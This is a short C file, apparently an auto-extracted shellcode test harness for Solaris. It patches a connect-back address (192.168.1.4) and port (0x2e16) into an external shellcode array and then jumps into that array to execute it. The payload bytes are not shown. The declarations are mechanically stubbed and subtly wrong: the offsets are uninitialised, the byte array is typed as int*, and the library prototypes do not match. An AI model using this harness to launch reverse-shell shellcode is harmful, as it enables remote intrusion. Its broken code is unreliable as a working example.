
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 size_t IP0 ;
 size_t IP1 ;
 size_t IP2 ;
 size_t IP3 ;
 size_t P0 ;
 size_t P1 ;
 int* _solaris_code ;
 int printf (char*,int) ;
 int strlen (int*) ;

int
main(void)
{
    void (*code)() = (void *)_solaris_code;

    _solaris_code[IP0] = 4;
    _solaris_code[IP1] = 1;
    _solaris_code[IP2] = 168;
    _solaris_code[IP3] = 192;

    _solaris_code[P0] = 0x2e;
    _solaris_code[P1] = 0x16;

    printf("Shellcode length: %d\n", strlen(_solaris_code));


    code();
    return(1);
}
